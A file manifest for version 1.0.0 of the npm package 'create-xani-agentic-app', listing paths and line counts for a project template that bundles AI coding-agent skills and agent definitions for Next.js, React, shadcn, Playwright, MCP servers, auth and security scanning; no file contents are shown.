create-xani-agentic-app 1.0.0
- package/README.md +237 -0
- package/index.js +219 -0
- package/package.json +46 -0
- package/template/.agents/skills/ai-sdk/SKILL.md +78 -0
- package/template/.agents/skills/ai-sdk/references/ai-gateway.md +66 -0
- package/template/.agents/skills/ai-sdk/references/common-errors.md +443 -0
- package/template/.agents/skills/ai-sdk/references/devtools.md +52 -0
- package/template/.agents/skills/ai-sdk/references/type-safe-agents.md +204 -0
- package/template/.agents/skills/better-auth-best-practices/SKILL.md +175 -0
- package/template/.agents/skills/checkpoint/SKILL.md +82 -0
- package/template/.agents/skills/create-spec/SKILL.md +132 -0
- package/template/.agents/skills/create-spec/references/action-required-template.md +53 -0
- package/template/.agents/skills/create-spec/references/readme-template.md +53 -0
- package/template/.agents/skills/create-spec/references/requirements-template.md +54 -0
- package/template/.agents/skills/create-spec/references/task-template.md +79 -0
- package/template/.agents/skills/find-skills/SKILL.md +142 -0
- package/template/.agents/skills/frontend-design/LICENSE.txt +177 -0
- package/template/.agents/skills/frontend-design/SKILL.md +42 -0
- package/template/.agents/skills/implement-feature/SKILL.md +189 -0
- package/template/.agents/skills/implement-feature/references/coder-prompt-template.md +46 -0
- package/template/.agents/skills/implement-feature/references/fix-prompt-template.md +38 -0
- package/template/.agents/skills/implement-feature/references/review-prompt-template.md +50 -0
- package/template/.agents/skills/mcp-builder/LICENSE.txt +202 -0
- package/template/.agents/skills/mcp-builder/SKILL.md +236 -0
- package/template/.agents/skills/mcp-builder/reference/evaluation.md +602 -0
- package/template/.agents/skills/mcp-builder/reference/mcp_best_practices.md +249 -0
- package/template/.agents/skills/mcp-builder/reference/node_mcp_server.md +970 -0
- package/template/.agents/skills/mcp-builder/reference/python_mcp_server.md +719 -0
- package/template/.agents/skills/mcp-builder/scripts/connections.py +151 -0
- package/template/.agents/skills/mcp-builder/scripts/evaluation.py +373 -0
- package/template/.agents/skills/mcp-builder/scripts/example_evaluation.xml +22 -0
- package/template/.agents/skills/mcp-builder/scripts/requirements.txt +2 -0
- package/template/.agents/skills/nextjs/SKILL.md +434 -0
- package/template/.agents/skills/nextjs/overlay.yaml +284 -0
- package/template/.agents/skills/nextjs/references/app-router-files.md +94 -0
- package/template/.agents/skills/nextjs/references/async-patterns.md +87 -0
- package/template/.agents/skills/nextjs/references/bundling.md +180 -0
- package/template/.agents/skills/nextjs/references/data-patterns.md +297 -0
- package/template/.agents/skills/nextjs/references/debug-tricks.md +105 -0
- package/template/.agents/skills/nextjs/references/directives.md +73 -0
- package/template/.agents/skills/nextjs/references/error-handling.md +227 -0
- package/template/.agents/skills/nextjs/references/file-conventions.md +140 -0
- package/template/.agents/skills/nextjs/references/font.md +245 -0
- package/template/.agents/skills/nextjs/references/functions.md +108 -0
- package/template/.agents/skills/nextjs/references/hydration-error.md +91 -0
- package/template/.agents/skills/nextjs/references/image.md +173 -0
- package/template/.agents/skills/nextjs/references/metadata.md +301 -0
- package/template/.agents/skills/nextjs/references/parallel-routes.md +287 -0
- package/template/.agents/skills/nextjs/references/route-handlers.md +146 -0
- package/template/.agents/skills/nextjs/references/rsc-boundaries.md +159 -0
- package/template/.agents/skills/nextjs/references/runtime-selection.md +39 -0
- package/template/.agents/skills/nextjs/references/scripts.md +141 -0
- package/template/.agents/skills/nextjs/references/self-hosting.md +371 -0
- package/template/.agents/skills/nextjs/references/suspense-boundaries.md +67 -0
- package/template/.agents/skills/nextjs/upstream/SKILL.md +153 -0
- package/template/.agents/skills/nextjs/upstream/references/app-router-files.md +94 -0
- package/template/.agents/skills/nextjs/upstream/references/async-patterns.md +87 -0
- package/template/.agents/skills/nextjs/upstream/references/bundling.md +180 -0
- package/template/.agents/skills/nextjs/upstream/references/data-patterns.md +297 -0
- package/template/.agents/skills/nextjs/upstream/references/debug-tricks.md +105 -0
- package/template/.agents/skills/nextjs/upstream/references/directives.md +73 -0
- package/template/.agents/skills/nextjs/upstream/references/error-handling.md +227 -0
- package/template/.agents/skills/nextjs/upstream/references/file-conventions.md +140 -0
- package/template/.agents/skills/nextjs/upstream/references/font.md +245 -0
- package/template/.agents/skills/nextjs/upstream/references/functions.md +108 -0
- package/template/.agents/skills/nextjs/upstream/references/hydration-error.md +91 -0
- package/template/.agents/skills/nextjs/upstream/references/image.md +173 -0
- package/template/.agents/skills/nextjs/upstream/references/metadata.md +301 -0
- package/template/.agents/skills/nextjs/upstream/references/parallel-routes.md +287 -0
- package/template/.agents/skills/nextjs/upstream/references/route-handlers.md +146 -0
- package/template/.agents/skills/nextjs/upstream/references/rsc-boundaries.md +159 -0
- package/template/.agents/skills/nextjs/upstream/references/runtime-selection.md +39 -0
- package/template/.agents/skills/nextjs/upstream/references/scripts.md +141 -0
- package/template/.agents/skills/nextjs/upstream/references/self-hosting.md +371 -0
- package/template/.agents/skills/nextjs/upstream/references/suspense-boundaries.md +67 -0
- package/template/.agents/skills/playwright-cli/SKILL.md +344 -0
- package/template/.agents/skills/playwright-cli/references/element-attributes.md +23 -0
- package/template/.agents/skills/playwright-cli/references/playwright-tests.md +39 -0
- package/template/.agents/skills/playwright-cli/references/request-mocking.md +87 -0
- package/template/.agents/skills/playwright-cli/references/running-code.md +231 -0
- package/template/.agents/skills/playwright-cli/references/session-management.md +169 -0
- package/template/.agents/skills/playwright-cli/references/storage-state.md +275 -0
- package/template/.agents/skills/playwright-cli/references/test-generation.md +88 -0
- package/template/.agents/skills/playwright-cli/references/tracing.md +139 -0
- package/template/.agents/skills/playwright-cli/references/video-recording.md +143 -0
- package/template/.agents/skills/review-pr/SKILL.md +97 -0
- package/template/.agents/skills/security-scanner/SKILL.md +157 -0
- package/template/.agents/skills/security-scanner/references/A01-broken-access-control.md +136 -0
- package/template/.agents/skills/security-scanner/references/A02-security-misconfiguration.md +130 -0
- package/template/.agents/skills/security-scanner/references/A03-software-supply-chain-failures.md +117 -0
- package/template/.agents/skills/security-scanner/references/A04-cryptographic-failures.md +141 -0
- package/template/.agents/skills/security-scanner/references/A05-injection.md +155 -0
- package/template/.agents/skills/security-scanner/references/A06-insecure-design.md +145 -0
- package/template/.agents/skills/security-scanner/references/A07-authentication-failures.md +150 -0
- package/template/.agents/skills/security-scanner/references/A08-software-data-integrity-failures.md +132 -0
- package/template/.agents/skills/security-scanner/references/A09-security-logging-alerting-failures.md +130 -0
- package/template/.agents/skills/security-scanner/references/A10-mishandling-exceptional-conditions.md +154 -0
- package/template/.agents/skills/security-scanner/references/report-template.md +148 -0
- package/template/.agents/skills/shadcn/SKILL.md +246 -0
- package/template/.agents/skills/shadcn/agents/openai.yml +5 -0
- package/template/.agents/skills/shadcn/assets/shadcn-small.png +0 -0
- package/template/.agents/skills/shadcn/assets/shadcn.png +0 -0
- package/template/.agents/skills/shadcn/cli.md +276 -0
- package/template/.agents/skills/shadcn/customization.md +209 -0
- package/template/.agents/skills/shadcn/evals/evals.json +47 -0
- package/template/.agents/skills/shadcn/mcp.md +94 -0
- package/template/.agents/skills/shadcn/rules/base-vs-radix.md +306 -0
- package/template/.agents/skills/shadcn/rules/composition.md +195 -0
- package/template/.agents/skills/shadcn/rules/forms.md +192 -0
- package/template/.agents/skills/shadcn/rules/icons.md +101 -0
- package/template/.agents/skills/shadcn/rules/styling.md +162 -0
- package/template/.agents/skills/ship-it/SKILL.md +174 -0
- package/template/.agents/skills/skill-creator/LICENSE.txt +202 -0
- package/template/.agents/skills/skill-creator/SKILL.md +485 -0
- package/template/.agents/skills/skill-creator/agents/analyzer.md +274 -0
- package/template/.agents/skills/skill-creator/agents/comparator.md +202 -0
- package/template/.agents/skills/skill-creator/agents/grader.md +223 -0
- package/template/.agents/skills/skill-creator/assets/eval_review.html +146 -0
- package/template/.agents/skills/skill-creator/eval-viewer/generate_review.py +471 -0
- package/template/.agents/skills/skill-creator/eval-viewer/viewer.html +1325 -0
- package/template/.agents/skills/skill-creator/references/schemas.md +430 -0
- package/template/.agents/skills/skill-creator/scripts/__init__.py +0 -0
- package/template/.agents/skills/skill-creator/scripts/aggregate_benchmark.py +401 -0
- package/template/.agents/skills/skill-creator/scripts/generate_report.py +326 -0
- package/template/.agents/skills/skill-creator/scripts/improve_description.py +247 -0
- package/template/.agents/skills/skill-creator/scripts/package_skill.py +136 -0
- package/template/.agents/skills/skill-creator/scripts/quick_validate.py +103 -0
- package/template/.agents/skills/skill-creator/scripts/run_eval.py +310 -0
- package/template/.agents/skills/skill-creator/scripts/run_loop.py +328 -0
- package/template/.agents/skills/skill-creator/scripts/utils.py +47 -0
- package/template/.agents/skills/vercel-react-best-practices/AGENTS.md +3750 -0
- package/template/.agents/skills/vercel-react-best-practices/README.md +123 -0
- package/template/.agents/skills/vercel-react-best-practices/SKILL.md +148 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/_sections.md +46 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/_template.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-effect-event-deps.md +56 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-event-handler-refs.md +55 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-init-once.md +42 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-use-latest.md +39 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-api-routes.md +38 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-cheap-condition-before-await.md +37 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-defer-await.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-dependencies.md +51 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-parallel.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-suspense-boundaries.md +99 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-barrel-imports.md +60 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-conditional.md +31 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-defer-third-party.md +49 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-dynamic-imports.md +35 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-preload.md +50 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-event-listeners.md +74 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-localstorage-schema.md +71 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-passive-event-listeners.md +48 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-swr-dedup.md +56 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-batch-dom-css.md +107 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-cache-function-results.md +80 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-cache-property-access.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-cache-storage.md +70 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-combine-iterations.md +32 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-early-exit.md +50 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-flatmap-filter.md +60 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-hoist-regexp.md +45 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-index-maps.md +37 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-length-check-first.md +49 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-min-max-loop.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-request-idle-callback.md +105 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-set-map-lookups.md +24 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-tosorted-immutable.md +57 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-activity.md +26 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-animate-svg-wrapper.md +47 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-conditional-render.md +40 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-content-visibility.md +38 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-hoist-jsx.md +46 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-hydration-no-flicker.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-hydration-suppress-warning.md +30 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-resource-hints.md +85 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-script-defer-async.md +68 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-svg-precision.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-usetransition-loading.md +75 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-defer-reads.md +39 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-dependencies.md +45 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-derived-state-no-effect.md +40 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-derived-state.md +29 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-functional-setstate.md +74 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-lazy-state-init.md +58 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-memo-with-default-value.md +38 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-memo.md +44 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-move-effect-to-event.md +45 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-no-inline-components.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-simple-expression-in-memo.md +35 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-split-combined-hooks.md +64 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-transitions.md +40 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-use-deferred-value.md +59 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-use-ref-transient-values.md +73 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-after-nonblocking.md +73 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-auth-actions.md +96 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-cache-lru.md +41 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-cache-react.md +76 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-dedup-props.md +65 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-hoist-static-io.md +149 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-no-shared-module-state.md +50 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-parallel-fetching.md +83 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-parallel-nested-fetching.md +34 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-serialization.md +38 -0
- package/template/.agents/skills/web-design-guidelines/SKILL.md +39 -0
- package/template/.claude/agents/better-auth-expert.md +189 -0
- package/template/.claude/agents/code-review.md +147 -0
- package/template/.claude/agents/coder.md +139 -0
- package/template/.claude/agents/deep-dive.md +133 -0
- package/template/.claude/agents/polar-payments-expert.md +140 -0
- package/template/.claude/agents/security-scanner.md +214 -0
- package/template/.claude/settings.local.json +15 -0
- package/template/.claude/skills/ai-sdk/SKILL.md +78 -0
- package/template/.claude/skills/ai-sdk/references/ai-gateway.md +66 -0
- package/template/.claude/skills/ai-sdk/references/common-errors.md +443 -0
- package/template/.claude/skills/ai-sdk/references/devtools.md +52 -0
- package/template/.claude/skills/ai-sdk/references/type-safe-agents.md +204 -0
- package/template/.claude/skills/better-auth-best-practices/SKILL.md +175 -0
- package/template/.claude/skills/caveman/SKILL.md +49 -0
- package/template/.claude/skills/checkpoint/SKILL.md +82 -0
- package/template/.claude/skills/create-spec/SKILL.md +132 -0
- package/template/.claude/skills/create-spec/references/action-required-template.md +53 -0
- package/template/.claude/skills/create-spec/references/readme-template.md +53 -0
- package/template/.claude/skills/create-spec/references/requirements-template.md +54 -0
- package/template/.claude/skills/create-spec/references/task-template.md +79 -0
- package/template/.claude/skills/d3-visualization/SKILL.md +62 -0
- package/template/.claude/skills/find-skills/SKILL.md +142 -0
- package/template/.claude/skills/frontend-design/LICENSE.txt +177 -0
- package/template/.claude/skills/frontend-design/SKILL.md +42 -0
- package/template/.claude/skills/grill-me/SKILL.md +10 -0
- package/template/.claude/skills/grill-with-docs/ADR-FORMAT.md +47 -0
- package/template/.claude/skills/grill-with-docs/CONTEXT-FORMAT.md +63 -0
- package/template/.claude/skills/grill-with-docs/SKILL.md +88 -0
- package/template/.claude/skills/gsap-core/SKILL.md +267 -0
- package/template/.claude/skills/implement-feature/SKILL.md +189 -0
- package/template/.claude/skills/implement-feature/references/coder-prompt-template.md +46 -0
- package/template/.claude/skills/implement-feature/references/fix-prompt-template.md +38 -0
- package/template/.claude/skills/implement-feature/references/review-prompt-template.md +50 -0
- package/template/.claude/skills/mcp-builder/LICENSE.txt +202 -0
- package/template/.claude/skills/mcp-builder/SKILL.md +236 -0
- package/template/.claude/skills/mcp-builder/reference/evaluation.md +602 -0
- package/template/.claude/skills/mcp-builder/reference/mcp_best_practices.md +249 -0
- package/template/.claude/skills/mcp-builder/reference/node_mcp_server.md +970 -0
- package/template/.claude/skills/mcp-builder/reference/python_mcp_server.md +719 -0
- package/template/.claude/skills/mcp-builder/scripts/connections.py +151 -0
- package/template/.claude/skills/mcp-builder/scripts/evaluation.py +373 -0
- package/template/.claude/skills/mcp-builder/scripts/example_evaluation.xml +22 -0
- package/template/.claude/skills/mcp-builder/scripts/requirements.txt +2 -0
- package/template/.claude/skills/nextjs/SKILL.md +434 -0
- package/template/.claude/skills/nextjs/overlay.yaml +284 -0
- package/template/.claude/skills/nextjs/references/app-router-files.md +94 -0
- package/template/.claude/skills/nextjs/references/async-patterns.md +87 -0
- package/template/.claude/skills/nextjs/references/bundling.md +180 -0
- package/template/.claude/skills/nextjs/references/data-patterns.md +297 -0
- package/template/.claude/skills/nextjs/references/debug-tricks.md +105 -0
- package/template/.claude/skills/nextjs/references/directives.md +73 -0
- package/template/.claude/skills/nextjs/references/error-handling.md +227 -0
- package/template/.claude/skills/nextjs/references/file-conventions.md +140 -0
- package/template/.claude/skills/nextjs/references/font.md +245 -0
- package/template/.claude/skills/nextjs/references/functions.md +108 -0
- package/template/.claude/skills/nextjs/references/hydration-error.md +91 -0
- package/template/.claude/skills/nextjs/references/image.md +173 -0
- package/template/.claude/skills/nextjs/references/metadata.md +301 -0
- package/template/.claude/skills/nextjs/references/parallel-routes.md +287 -0
- package/template/.claude/skills/nextjs/references/route-handlers.md +146 -0
- package/template/.claude/skills/nextjs/references/rsc-boundaries.md +159 -0
- package/template/.claude/skills/nextjs/references/runtime-selection.md +39 -0
- package/template/.claude/skills/nextjs/references/scripts.md +141 -0
- package/template/.claude/skills/nextjs/references/self-hosting.md +371 -0
- package/template/.claude/skills/nextjs/references/suspense-boundaries.md +67 -0
- package/template/.claude/skills/nextjs/upstream/SKILL.md +153 -0
- package/template/.claude/skills/nextjs/upstream/references/app-router-files.md +94 -0
- package/template/.claude/skills/nextjs/upstream/references/async-patterns.md +87 -0
- package/template/.claude/skills/nextjs/upstream/references/bundling.md +180 -0
- package/template/.claude/skills/nextjs/upstream/references/data-patterns.md +297 -0
- package/template/.claude/skills/nextjs/upstream/references/debug-tricks.md +105 -0
- package/template/.claude/skills/nextjs/upstream/references/directives.md +73 -0
- package/template/.claude/skills/nextjs/upstream/references/error-handling.md +227 -0
- package/template/.claude/skills/nextjs/upstream/references/file-conventions.md +140 -0
- package/template/.claude/skills/nextjs/upstream/references/font.md +245 -0
- package/template/.claude/skills/nextjs/upstream/references/functions.md +108 -0
- package/template/.claude/skills/nextjs/upstream/references/hydration-error.md +91 -0
- package/template/.claude/skills/nextjs/upstream/references/image.md +173 -0
- package/template/.claude/skills/nextjs/upstream/references/metadata.md +301 -0
- package/template/.claude/skills/nextjs/upstream/references/parallel-routes.md +287 -0
- package/template/.claude/skills/nextjs/upstream/references/route-handlers.md +146 -0
- package/template/.claude/skills/nextjs/upstream/references/rsc-boundaries.md +159 -0
- package/template/.claude/skills/nextjs/upstream/references/runtime-selection.md +39 -0
- package/template/.claude/skills/nextjs/upstream/references/scripts.md +141 -0
- package/template/.claude/skills/nextjs/upstream/references/self-hosting.md +371 -0
- package/template/.claude/skills/nextjs/upstream/references/suspense-boundaries.md +67 -0
- package/template/.claude/skills/playwright-cli/SKILL.md +344 -0
- package/template/.claude/skills/playwright-cli/references/element-attributes.md +23 -0
- package/template/.claude/skills/playwright-cli/references/playwright-tests.md +39 -0
- package/template/.claude/skills/playwright-cli/references/request-mocking.md +87 -0
- package/template/.claude/skills/playwright-cli/references/running-code.md +231 -0
- package/template/.claude/skills/playwright-cli/references/session-management.md +169 -0
- package/template/.claude/skills/playwright-cli/references/storage-state.md +275 -0
- package/template/.claude/skills/playwright-cli/references/test-generation.md +88 -0
- package/template/.claude/skills/playwright-cli/references/tracing.md +139 -0
- package/template/.claude/skills/playwright-cli/references/video-recording.md +143 -0
- package/template/.claude/skills/react-three-fiber/SKILL.md +180 -0
- package/template/.claude/skills/remotion/SKILL.md +43 -0
- package/template/.claude/skills/review-pr/SKILL.md +97 -0
- package/template/.claude/skills/security-scanner/SKILL.md +157 -0
- package/template/.claude/skills/security-scanner/references/A01-broken-access-control.md +136 -0
- package/template/.claude/skills/security-scanner/references/A02-security-misconfiguration.md +130 -0
- package/template/.claude/skills/security-scanner/references/A03-software-supply-chain-failures.md +117 -0
- package/template/.claude/skills/security-scanner/references/A04-cryptographic-failures.md +141 -0
- package/template/.claude/skills/security-scanner/references/A05-injection.md +155 -0
- package/template/.claude/skills/security-scanner/references/A06-insecure-design.md +145 -0
- package/template/.claude/skills/security-scanner/references/A07-authentication-failures.md +150 -0
- package/template/.claude/skills/security-scanner/references/A08-software-data-integrity-failures.md +132 -0
- package/template/.claude/skills/security-scanner/references/A09-security-logging-alerting-failures.md +130 -0
- package/template/.claude/skills/security-scanner/references/A10-mishandling-exceptional-conditions.md +154 -0
- package/template/.claude/skills/security-scanner/references/report-template.md +148 -0
- package/template/.claude/skills/shadcn/SKILL.md +246 -0
- package/template/.claude/skills/shadcn/agents/openai.yml +5 -0
- package/template/.claude/skills/shadcn/assets/shadcn-small.png +0 -0
- package/template/.claude/skills/shadcn/assets/shadcn.png +0 -0
- package/template/.claude/skills/shadcn/cli.md +276 -0
- package/template/.claude/skills/shadcn/customization.md +209 -0
- package/template/.claude/skills/shadcn/evals/evals.json +47 -0
- package/template/.claude/skills/shadcn/mcp.md +94 -0
- package/template/.claude/skills/shadcn/rules/base-vs-radix.md +306 -0
- package/template/.claude/skills/shadcn/rules/composition.md +195 -0
- package/template/.claude/skills/shadcn/rules/forms.md +192 -0
- package/template/.claude/skills/shadcn/rules/icons.md +101 -0
- package/template/.claude/skills/shadcn/rules/styling.md +162 -0
- package/template/.claude/skills/ship-it/SKILL.md +174 -0
- package/template/.claude/skills/skill-creator/LICENSE.txt +202 -0
- package/template/.claude/skills/skill-creator/SKILL.md +485 -0
- package/template/.claude/skills/skill-creator/agents/analyzer.md +274 -0
- package/template/.claude/skills/skill-creator/agents/comparator.md +202 -0
- package/template/.claude/skills/skill-creator/agents/grader.md +223 -0
- package/template/.claude/skills/skill-creator/assets/eval_review.html +146 -0
- package/template/.claude/skills/skill-creator/eval-viewer/generate_review.py +471 -0
- package/template/.claude/skills/skill-creator/eval-viewer/viewer.html +1325 -0
- package/template/.claude/skills/skill-creator/references/schemas.md +430 -0
- package/template/.claude/skills/skill-creator/scripts/__init__.py +0 -0
- package/template/.claude/skills/skill-creator/scripts/aggregate_benchmark.py +401 -0
- package/template/.claude/skills/skill-creator/scripts/generate_report.py +326 -0
- package/template/.claude/skills/skill-creator/scripts/improve_description.py +247 -0
- package/template/.claude/skills/skill-creator/scripts/package_skill.py +136 -0
- package/template/.claude/skills/skill-creator/scripts/quick_validate.py +103 -0
- package/template/.claude/skills/skill-creator/scripts/run_eval.py +310 -0
- package/template/.claude/skills/skill-creator/scripts/run_loop.py +328 -0
- package/template/.claude/skills/skill-creator/scripts/utils.py +47 -0
- package/template/.claude/skills/svelte/SKILL.md +284 -0
- package/template/.claude/skills/tdd/SKILL.md +109 -0
- package/template/.claude/skills/tdd/deep-modules.md +33 -0
- package/template/.claude/skills/tdd/interface-design.md +31 -0
- package/template/.claude/skills/tdd/mocking.md +59 -0
- package/template/.claude/skills/tdd/refactoring.md +10 -0
- package/template/.claude/skills/tdd/tests.md +61 -0
- package/template/.claude/skills/threejs/SKILL.md +43 -0
- package/template/.claude/skills/to-issues/SKILL.md +83 -0
- package/template/.claude/skills/to-prd/SKILL.md +76 -0
- package/template/.claude/skills/vercel-react-best-practices/AGENTS.md +3750 -0
- package/template/.claude/skills/vercel-react-best-practices/README.md +123 -0
- package/template/.claude/skills/vercel-react-best-practices/SKILL.md +148 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/_sections.md +46 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/_template.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-effect-event-deps.md +56 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-event-handler-refs.md +55 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-init-once.md +42 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-use-latest.md +39 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-api-routes.md +38 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-cheap-condition-before-await.md +37 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-defer-await.md +82 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-dependencies.md +51 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-parallel.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-suspense-boundaries.md +99 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-barrel-imports.md +60 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-conditional.md +31 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-defer-third-party.md +49 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-dynamic-imports.md +35 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-preload.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-event-listeners.md +74 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-localstorage-schema.md +71 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-passive-event-listeners.md +48 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-swr-dedup.md +56 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-batch-dom-css.md +107 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-cache-function-results.md +80 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-cache-property-access.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-cache-storage.md +70 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-combine-iterations.md +32 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-early-exit.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-flatmap-filter.md +60 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-hoist-regexp.md +45 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-index-maps.md +37 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-length-check-first.md +49 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-min-max-loop.md +82 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-request-idle-callback.md +105 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-set-map-lookups.md +24 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-tosorted-immutable.md +57 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-activity.md +26 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-animate-svg-wrapper.md +47 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-conditional-render.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-content-visibility.md +38 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-hoist-jsx.md +46 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-hydration-no-flicker.md +82 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-hydration-suppress-warning.md +30 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-resource-hints.md +85 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-script-defer-async.md +68 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-svg-precision.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-usetransition-loading.md +75 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-defer-reads.md +39 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-dependencies.md +45 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-derived-state-no-effect.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-derived-state.md +29 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-functional-setstate.md +74 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-lazy-state-init.md +58 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-memo-with-default-value.md +38 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-memo.md +44 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-move-effect-to-event.md +45 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-no-inline-components.md +82 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-simple-expression-in-memo.md +35 -0
